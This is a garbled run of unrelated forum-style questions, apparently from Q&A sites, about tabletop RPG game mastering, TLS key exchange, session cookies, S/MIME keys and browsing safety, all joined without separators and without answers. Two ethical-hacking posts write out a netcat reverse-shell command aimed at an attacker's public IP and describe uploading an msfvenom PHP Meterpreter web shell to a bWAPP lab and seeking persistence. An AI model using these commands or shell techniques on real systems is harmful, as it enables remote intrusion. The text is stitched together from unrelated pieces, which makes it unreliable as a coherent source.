As a GM, what kind of techniques could I use to help a player re-join the gaming session after their character dies? I want to avoid any major interruptions to the flow of the adventure. I would also like to avoid having to end the session immediately or making them sit on the side-lines for the rest of the session.
I understand that I should only visit https:// websites, have a good antivirus, check the router for signs of DNS issues.
What other precautions can one take?
I am a student working on an ethical hacking project.
How do I set a netcat session over the internet? My project requires us to use a public service like AWS or DigitalOcean as the victim machine and my own PC as an attacker machine. I tried the following commands:
Attacker’s machine running the latest Kali 2020.3 (Tried NAT VM setup and live booting too):
nc -nlvp 5555
Victim’s machine running Ubuntu 18.04.05:
/bin/sh | nc <PUBLIC IP OF ATTACKER's MACHINE> 5555
But it just does not open a reverse shell on the attacker’s machine. Did I miss out anything?
I am going to explain this with an example. Jake and Kevin own a company called facebook. They want a means of advertisement, so they create an account named facebook, and immediately after creating it both of them log in to the account and start advertising. Later Jake wanted to change the name of their company to stackoverflow, so he went to the settings and did just that. The problem now is that on Jake’s laptop the name is stackoverflow, but on Kevin’s laptop the name is facebook. How can I make it so that at the point of submission my PHP script checks if the user name for any other session is facebook and changes it to stackoverflow?
I have a question about the Key Exchange Algorithm used in TLS process. I have read that the Key Exchange algorithm is used by client and server to exchange session keys. Do the client and server exchange session keys at the end of Handshake process? If they arrive mathematically at the same results for session keys at the end of the process, why would they exchange them?
I am currently DMing for a group of 5 players. A friend of some of the players is very interested in learning about the game.
I have decided to let her play an NPC in one of the upcoming sessions, to gain more insight into this game.
This NPC is already fleshed out and will be an integral part of the story when she shows up. Therefore I am not able to completely adapt this NPC to the guest’s wishes.
I have so far tried to describe as much as possible of the NPC, its place in the world, family, motivation etc. to the guest. Also some key behaviours that are relevant to the gameplay, i.e. how she needs to react, what she needs to tell the PCs when asked for it.
Nevertheless, our guest is still rather nervous about the upcoming session. As we probably all were in our first sessions. I am trying to encourage and support her as much as possible, and I am sure she will do fine.
Nevertheless, I am still wondering if there are specific things I could do to help her in this role and to make her experience great?
I know this situation is very similar to having a new player join a group. And I have read many discussions/answers regarding this situation. But this situation is slightly different since she was not able to choose her own character, but has to act out my pre-written NPC. She will be more limited than if she could just do her own character.
I just set up a lab with bwapp and wanted to jump straight into webshell. I used Unrestricted file upload vuln -> uploaded my perfect shell created with msfvenom.
My only problem is that my session doesn’t seem persistent as I’m getting Meterpreter session opened and then died.
For more context, bwapp is on a bridged network vbox and my kali is also bridged.
php/meterpreter_reverse_tcp etc etc.
I need persistence (RCE)
Some background first. A while back I ran a Paranoia session that ended up having about 10 players joining. In order to facilitate running it, a friend who is also an experienced DM offered to support in running the session. Between us we split the DM duties: handling messages from players as they attempted to betray and backstab each other, taking it in turns to role-play Friend Computer (ignoring most of what we had each said to add more chaos and confusion) and taking on different aspects of the game between us.
This worked really well for Paranoia, which lends itself to a bit of chaos. However, a smaller group have now asked us about co-GMing a more traditional system. We are considering either DnD, Cyberpunk or Deadlands, but before we decide on a system we want to work out the best way to run this.
Is there any advice or suggestions, or direction to good resources, to talk through the pitfalls and issues that can arise and the best way to manage the GM activities?
Background: I’ve been using a simple session cookie design for my web app. I have a users table, and a sessions table that basically looks like this:
 id  | user_id | visited_at
-----+---------+------------
 int | int     | timestamp
And a session cookie contains just a session ID, signed with a secret key. I give the cookie an expiration date (but the source of truth is still the timestamp in the DB), and make sure it’s secure and HTTP-only.
Then I came across these threads:
I think tptacek is basically saying that, instead of storing the signed session ID in the cookie, I can make the sessions table like this:
 id      | user_id | visited_at
---------+---------+------------
 varchar | int     | timestamp
id is a randomly generated 16+ byte key encoded as a string, and simply store this string in the session cookie w/o any encryption/signing.
Is this approach secure? Does it have any downsides due to the lack of a signing phase? (I was thinking w/o signing we can’t invalidate all sessions by changing the server secret, but then I think we can just delete all the sessions from the DB since we are not doing stateless authentication anyway.)
UPDATE: I think maybe one benefit of the signing approach is that I can save some space in my DB by using an integer primary key. But I’m more interested in the security aspect.
I’ve been preparing for a CISSP exam and was reading about applied cryptography in regard to email.
It’s my understanding that the popular schemes (PGP, S/MIME) use a combination of asymmetric and symmetric cryptography. If I’m reading things correctly, in S/MIME, the message is encrypted using a sender-generated symmetric key. In turn, the symmetric key is encrypted using the receiver’s public key.
If the receiver changed their private key, they would no longer be able to decrypt the message. However, I was wondering if it was possible to recover the symmetric key from when the email was previously opened?
My guess would be that the email client does not intentionally store the key since that would present a security risk. Just wanted to see if that actually occurs or if there’s something I’m missing.